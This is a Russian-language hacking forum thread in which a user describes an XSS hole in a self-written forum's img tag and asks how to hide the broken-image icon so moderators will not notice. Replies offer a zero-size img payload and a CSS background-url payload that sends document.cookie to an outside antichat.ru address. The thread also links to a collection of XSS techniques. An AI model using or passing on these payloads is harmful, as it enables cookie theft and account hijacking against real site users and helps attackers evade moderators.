Ребят нашел XSS в теге img, примерно так:
<img src="javascript:alert()">
но вот незадача, при отображении на форуме остается значек незагруженной картинки, мне кажется что это особо пытливых модеров заитересует...как мне "<img src="javascript:alert()">"
после выполнения скрипта присвоить реальную картинку?...document.image[0].src не катит ибо не знаю номер моей картинки в массиве image[]...

скажи форум, может можно придумать что-то

А там можно сделать перенаправление на картинку с другого сайта?

скажи форум, может можно придумать что-то
Форум самописаный...

А там можно сделать перенаправление на картинку с другого сайта?
Можно....

Ребят нашел XSS в теге img, примерно так:
<img src="javascript:alert()">
но вот незадача, при отображении на форуме остается значек незагруженной картинки, мне кажется что это особо пытливых модеров заитересует...как мне "<img src="javascript:alert()">"
после выполнения скрипта присвоить реальную картинку?...document.image[0].src не катит ибо не знаю номер моей картинки в массиве image[]...
<img src="javascript :alert()" width=0 height=0> Из этого и делай свой код.
Ешё можно использовать скрипт в STYLE примерно таким образом

style=display:none;background:url(javascript:ANTIC HAT.src='http://antichat.ru/cg-bin/s.gif?'+document.cookie);name=ANTICHAT

почти всё что связано с реализацией XSS можно найти тут http://www.antichat.ru/crackchat/HTML/